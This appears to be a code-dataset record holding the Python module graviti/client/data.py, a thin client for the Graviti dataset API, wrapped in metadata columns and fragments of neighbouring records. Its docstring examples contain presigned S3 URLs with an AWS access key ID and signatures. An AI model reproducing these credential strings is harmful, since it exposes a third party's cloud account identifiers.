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"}')
| 309.483871
| 8,345
| 0.931676
| 772
| 19,188
| 23.053109
| 0.393782
| 0.012643
| 0.013485
| 0.009103
| 0.97213
| 0.959207
| 0.958757
| 0.958757
| 0.9419
| 0.939821
| 0
| 0.140527
| 0.028716
| 19,188
| 61
| 8,346
| 314.557377
| 0.814401
| 0.00641
| 0
| 0.177778
| 0
| 0.044444
| 0.882325
| 0.876817
| 0
| 1
| 0
| 0
| 0.4
| 1
| 0.111111
| false
| 0
| 0.155556
| 0
| 0.288889
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
fa363704ca41abf33dd820cadc0c4f877e438a8f
| 19,361
|
py
|
Python
|
graviti/client/data.py
|
wangyuqing0424/graviti-python-sdk
|
66300cc1edda6a848cac094899afb3d0421c595d
|
[
"MIT"
] | null | null | null |
graviti/client/data.py
|
wangyuqing0424/graviti-python-sdk
|
66300cc1edda6a848cac094899afb3d0421c595d
|
[
"MIT"
] | null | null | null |
graviti/client/data.py
|
wangyuqing0424/graviti-python-sdk
|
66300cc1edda6a848cac094899afb3d0421c595d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright 2022 Graviti. Licensed under MIT License.
#
"""Interfaces about data."""
from typing import Any, Dict, Optional
from urllib.parse import urljoin
from graviti.client.requests import URL_PATH_PREFIX, open_api_do
def list_data(
url: str,
access_key: str,
dataset_id: str,
segment_name: str,
*,
draft_number: Optional[int] = None,
commit: Optional[str] = None,
offset: int = 0,
limit: int = 128,
) -> Dict[str, Any]:
"""Execute the OpenAPI `GET /v1/datasets{id}/data`.
Arguments:
url: The URL of the graviti website.
access_key: User's access key.
dataset_id: Dataset ID.
segment_name: The name of the segment.
draft_number: The draft number.
commit: The information to locate the specific commit, which can be the commit id,
the branch name, or the tag name.
offset: The offset of the page.
limit: The limit of the page.
Returns:
The response of OpenAPI.
Examples:
List data of the segment with the given name and commit/draft_number:
>>> list_data(
... "https://gas.graviti.com/",
... "ACCESSKEY-********",
... "2bc95d506db2401b898067f1045d7f68",
... "test",
... commit="main"
... )
{
"segmentName": "test",
"type": 0,
"data": [
{
"remotePath": "Abyssinian_002.jpg",
"checksum": "abd792a155306e9cd95c04453585bc935f8e035a"
},
{
"remotePath": "Abyssinian_003.jpg",
"checksum": "aa2b8272c79307b070a323786156888fade039fb"
},
{
"remotePath": "Abyssinian_004.jpg",
"checksum": "45dd8bab98187d89b3857b13a3843207eb7e4df6"
},
{
"remotePath": "Abyssinian_005.jpg",
"checksum": "b104c78b54a8113e62a3a4f0e8017d36fc7849c9"
},
...
],
"offset": 0,
"recordSize": 128,
"totalCount": 3704
}
"""
url = urljoin(url, f"{URL_PATH_PREFIX}/datasets/{dataset_id}/data")
params: Dict[str, Any] = {"segmentName": segment_name, "offset": offset, "limit": limit}
if draft_number:
params["draftNumber"] = draft_number
if commit:
params["commit"] = commit
return open_api_do(url, access_key, "GET", params=params).json() # type: ignore[no-any-return]
def list_data_details(
url: str,
access_key: str,
dataset_id: str,
segment_name: str,
*,
draft_number: Optional[int] = None,
commit: Optional[str] = None,
remote_path: Optional[str] = None,
is_internal: bool = False,
offset: int = 0,
limit: int = 128,
) -> Dict[str, Any]:
"""Execute the OpenAPI `GET /v1/datasets{id}/data/details`.
Arguments:
url: The URL of the graviti website.
access_key: User's access key.
dataset_id: Dataset ID.
segment_name: The name of the segment.
draft_number: The draft number.
commit: The information to locate the specific commit, which can be the commit id,
the branch name, or the tag name.
remote_path: The remote path of the data.
is_internal: Whether the request is from internal.
offset: The offset of the page.
limit: The limit of the page.
Returns:
The response of OpenAPI.
Examples:
List data details of the segment with the given name and commit/draft_number:
>>> list_data_details(
... "https://gas.graviti.com/",
... "ACCESSKEY-********",
... "2bc95d506db2401b898067f1045d7f68",
... "test",
... commit="main"
... )
{
"segmentName": "test",
"type": 0,
"dataDetails": [
{
"remotePath": "Abyssinian_002.jpg",
"checksum": "abd792a155306e9cd95c04453585bc935f8e035a",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
460dcf7bf0e6814287c3190ddaa589b80045efec?X-Amz-Algorithm=AWS4-HMAC-SHA256&X
-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-1%2Fs3%2Faws4
_request&X-Amz-Date=20220124T113435Z&X-Amz-Expires=86400&X-Amz-SignedHeaders
=host&X-Amz-Signature=8ca0815037ef11effdc589983bb07f738fd7f3a0ec8b902dbf0ea
a5861340450",
"label": {
"CLASSIFICATION": {
"category": "Cat.Abyssinian"
},
"SEMANTIC_MASK": {
"checksum": "997a137a5915963a93cd2da318013927dbfc1632",
"remotePath": "Abyssinian_002.png",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
997a137a5915963a93cd2da318013927dbfc1632?X-Amz-Algorithm=AWS4-HMAC
-SHA256&X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west
-1%2Fs3%2Faws4_request&X-Amz-Date=20220124T113435Z&X-Amz-Expires=
86400&X-Amz-SignedHeaders=host&X-Amz-Signature=
c888dfaf8eca42b3c693f1e372252541c35c8a197b72f03ffbc2bf2e7249fdc3"
}
}
},
{
"remotePath": "Abyssinian_003.jpg",
"checksum": "aa2b8272c79307b070a323786156888fade039fb",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
49f003b21b8ae4f3ff2f74f13f2e99cefdec999d?X-Amz-Algorithm=AWS4-HMAC-SHA256&X
-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-1%2Fs3%2Faws4
_request&X-Amz-Date=20220124T113435Z&X-Amz-Expires=86400&X-Amz-SignedHeader
s=host&X-Amz-Signature=ae4399c1302896aeb8d03602b514e02f24b234c4ce212d15c003
d4cdd03e16b7",
"label": {
"CLASSIFICATION": {
"category": "Cat.Abyssinian"
},
"SEMANTIC_MASK": {
"checksum": "0702933b25e409e78d256b705aa13e9abede571e",
"remotePath": "Abyssinian_003.png",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
0702933b25e409e78d256b705aa13e9abede571e?X-Amz-Algorithm=AWS4-HMAC
-SHA256&X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west
-1%2Fs3%2Faws4_request&X-Amz-Date=20220124T113435Z&X-Amz-Expires
=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=6de16cb733a72c40ac
47da7565c6c73c033c501f3cd3927276eaa707dae34f5a"
}
}
},
...
],
"offset": 0,
"recordSize": 128,
"totalCount": 3704
}
Get data details with the given segment name, remote path and commit/draft_number:
>>> list_data_details(
... "https://gas.graviti.com/",
... "ACCESSKEY-********",
... "2bc95d506db2401b898067f1045d7f68",
... "test",
... commit="main",
... remote_path="Abyssinian_003.jpg"
... )
{
"segmentName": "test",
"type": 0,
"dataDetails": [
{
"remotePath": "Abyssinian_003.jpg",
"checksum": "aa2b8272c79307b070a323786156888fade039fb",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
49f003b21b8ae4f3ff2f74f13f2e99cefdec999d?X-Amz-Algorithm=AWS4-HMAC-
SHA256&X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-1%2Fs3%
2Faws4_request&X-Amz-Date=20220124T114154Z&X-Amz-Expires=86400&X-Amz-
SignedHeaders=host&X-Amz-Signature=8c91239ef9434a8b9bd62bb0f9757f846de56c
650a0ddb87b9745bca1bcd1ccf",
"label": {
"CLASSIFICATION": {
"category": "Cat.Abyssinian"
},
"SEMANTIC_MASK": {
"checksum": "0702933b25e409e78d256b705aa13e9abede571e",
"remotePath": "Abyssinian_003.png",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
0702933b25e409e78d256b705aa13e9abede571e?X-Amz-Algorithm=AWS4-HMAC-
SHA256&X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-
1%2Fs3%2Faws4_request&X-Amz-Date=20220124T114154Z&X-Amz-Expires=
86400&X-Amz-SignedHeaders=host&X-Amz-Signature=c0d15a972e3b5318e
66af924195fd61741426a4f3b7fd29093ec7b1699b162f8"
}
}
}
],
"offset": 0,
"recordSize": 1,
"totalCount": 1
}
"""
url = urljoin(url, f"{URL_PATH_PREFIX}/datasets/{dataset_id}/data/details")
params: Dict[str, Any] = {"segmentName": segment_name, "offset": offset, "limit": limit}
if draft_number:
params["draftNumber"] = draft_number
if commit:
params["commit"] = commit
if remote_path:
params["remotePath"] = remote_path
if is_internal:
params["isInternal"] = is_internal
return open_api_do(url, access_key, "GET", params=params).json() # type: ignore[no-any-return]
def list_data_urls(
url: str,
access_key: str,
dataset_id: str,
segment_name: str,
*,
draft_number: Optional[int] = None,
commit: Optional[str] = None,
remote_path: Optional[str] = None,
is_internal: bool = False,
offset: int = 0,
limit: int = 128,
) -> Dict[str, Any]:
"""Execute the OpenAPI `GET /v1/datasets{id}/data/urls`.
Arguments:
url: The URL of the graviti website.
access_key: User's access key.
dataset_id: Dataset ID.
segment_name: The name of the segment.
draft_number: The draft number.
commit: The information to locate the specific commit, which can be the commit id,
the branch name, or the tag name.
remote_path: The remote path of the data.
is_internal: Whether the request is from internal.
offset: The offset of the page.
limit: The limit of the page.
Returns:
The response of OpenAPI.
Examples:
List data urls of the segment with the given name and commit/draft_number:
>>> list_data_urls(
... "https://gas.graviti.com/",
... "ACCESSKEY-********",
... "2bc95d506db2401b898067f1045d7f68",
... "test",
... commit="main"
... )
{
"segmentName": "test",
"urls": [
{
"remotePath": "Abyssinian_002.jpg",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
460dcf7bf0e6814287c3190ddaa589b80045efec?X-Amz-Algorithm=AWS4-HMAC-SHA256&
X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-1%2Fs3%2Faws4_
request&X-Amz-Date=20220124T114451Z&X-Amz-Expires=86400&X-Amz-SignedHeaders
=host&X-Amz-Signature=8180b432736b4f9f31a1880f136668ee0f52bc590c297620a05df
122b5cd3e73"
},
{
"remotePath": "Abyssinian_003.jpg",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
49f003b21b8ae4f3ff2f74f13f2e99cefdec999d?X-Amz-Algorithm=AWS4-HMAC-SHA256&X
-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-1%2Fs3%2Faws4_
request&X-Amz-Date=20220124T114451Z&X-Amz-Expires=86400&X-Amz-
SignedHeaders=host&X-Amz-Signature=33a9da0cdf25688249c59fec6404
0bbc9ca462dbf8df920ee4a7eafa25ade7ee"
},
...
],
"offset": 0,
"recordSize": 128,
"totalCount": 3704
}
Get data urls with the given segment name, remote path and draft number or commit:
>>> list_data_urls(
... "https://gas.graviti.com/",
... "ACCESSKEY-********",
... "2bc95d506db2401b898067f1045d7f68",
... "test",
... commit="main",
... remote_path="Abyssinian_003.jpg"
... )
{
"segmentName": "test",
"urls": [
{
"remotePath": "Abyssinian_003.jpg",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
49f003b21b8ae4f3ff2f74f13f2e99cefdec999d?X-Amz-Algorithm=AWS4-HMAC-
SHA256&X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-
1%2Fs3%2Faws4_request&X-Amz-Date=20220124T114745Z&X-Amz-Expires=86400&X-
Amz-SignedHeaders=host&X-Amz-Signature=5b0c279a61a53a3f9c7c9e5e0b5de6b3a
3811a4c1876a058b859ec744608940f"
}
],
"offset": 0,
"recordSize": 0,
"totalCount": 0
}
"""
url = urljoin(url, f"{URL_PATH_PREFIX}/datasets/{dataset_id}/data/urls")
params: Dict[str, Any] = {"segmentName": segment_name, "offset": offset, "limit": limit}
if draft_number:
params["draftNumber"] = draft_number
if commit:
params["commit"] = commit
if remote_path:
params["remotePath"] = remote_path
if is_internal:
params["isInternal"] = is_internal
return open_api_do(url, access_key, "GET", params=params).json() # type: ignore[no-any-return]
def list_mask_urls(
url: str,
access_key: str,
dataset_id: str,
segment_name: str,
mask_type: str,
*,
draft_number: Optional[int] = None,
commit: Optional[str] = None,
remote_path: Optional[str] = None,
is_internal: bool = False,
offset: int = 0,
limit: int = 128,
) -> Dict[str, Any]:
"""Execute the OpenAPI `GET /v1/datasets{id}/masks/urls`.
Arguments:
url: The URL of the graviti website.
access_key: User's access key.
dataset_id: Dataset ID.
segment_name: The name of the segment.
mask_type: The required mask type, the supported types are ``SEMANTIC_MASK``,
``INSTANCE_MASK`` and ``PANOPTIC_MASK``
draft_number: The draft number.
commit: The information to locate the specific commit, which can be the commit id,
the branch name, or the tag name.
remote_path: The remote path of the data.
is_internal: Whether the request is from internal.
offset: The offset of the page.
limit: The limit of the page.
Returns:
The response of OpenAPI.
Examples:
List mask urls of the segment with the given name and commit/draft_number:
>>> list_mask_urls(
... "https://gas.graviti.com/",
... "ACCESSKEY-********",
... "2bc95d506db2401b898067f1045d7f68",
... "test",
... "SEMANTIC_MASK",
... commit="main"
... )
{
"segmentName": "test",
"urls": [
{
"remotePath": "Abyssinian_002.png",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
997a137a5915963a93cd2da318013927dbfc1632?X-Amz-Algorithm=AWS4-HMAC-
SHA256&X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-
1%2Fs3%2Faws4_request&X-Amz-Date=20220124T115625Z&X-Amz-Expires=
86400&X-Amz-SignedHeaders=host&X-Amz-Signature=95011ca650a5da6e2e
9077c425f878d4ba446f2f5032ab8622f72111816d43d4"
},
{
"remotePath": "Abyssinian_003.png",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
0702933b25e409e78d256b705aa13e9abede571e?X-Amz-Algorithm=AWS4-HMAC-
SHA256&X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-
1%2Fs3%2Faws4_request&X-Amz-Date=20220124T115625Z&X-Amz-Expires=86400&X-
Amz-SignedHeaders=host&X-Amz-Signature=c116ac8efcebaa34698350add2f
238fa3c53a5cd02ae3e605109e37c7efcc820"
},
],
"offset": 0,
"recordSize": 128,
"totalCount": 3704
}
Get mask urls with the given segment name, remote path and commit/draft_number:
>>> list_mask_urls(
... "https://gas.graviti.com/",
... "ACCESSKEY-********",
... "2bc95d506db2401b898067f1045d7f68",
... "main",
... "SEMANTIC_MASK",
... commit="main",
... remote_path="Abyssinian_003.png"
... )
{
"segmentName": "test",
"urls": [
{
"remotePath": "Abyssinian_003.png",
"url": "https://pro-dataplatform-version.s3-accelerate.amazonaws.com/
0702933b25e409e78d256b705aa13e9abede571e?X-Amz-Algorithm=AWS4-HMAC-
SHA256&X-Amz-Credential=AKIAQHTWCA3JFQMBFK5T%2F20220124%2Fus-west-
1%2Fs3%2Faws4_request&X-Amz-Date=20220124T115957Z&X-Amz-Expires=86400&X-
Amz-SignedHeaders=host&X-Amz-Signature=0709dc6e14f09ba79b7a346d901b70c
ab8ada3fa837c5eb54c7c88acda60959b"
}
],
"offset": 0,
"recordSize": 1,
"totalCount": 3704
}
"""
url = urljoin(url, f"{URL_PATH_PREFIX}/datasets/{dataset_id}/masks/urls")
params: Dict[str, Any] = {
"segmentName": segment_name,
"maskType": mask_type,
"offset": offset,
"limit": limit,
}
if draft_number:
params["draftNumber"] = draft_number
if commit:
params["commit"] = commit
if remote_path:
params["remotePath"] = remote_path
if is_internal:
params["isInternal"] = is_internal
return open_api_do(url, access_key, "GET", params=params).json() # type: ignore[no-any-return]
| 39.837449
| 100
| 0.541449
| 1,723
| 19,361
| 5.987232
| 0.113175
| 0.027918
| 0.012796
| 0.026755
| 0.857503
| 0.853044
| 0.826095
| 0.817953
| 0.793912
| 0.789647
| 0
| 0.144559
| 0.349724
| 19,361
| 485
| 101
| 39.919588
| 0.674821
| 0.761531
| 0
| 0.818182
| 0
| 0
| 0.132697
| 0.060037
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040404
| false
| 0
| 0.030303
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa686070d9db5729b703f86cbe6bdddc0cc9aa82
| 74
|
py
|
Python
|
db/ticker.py
|
CryptoInsights/query
|
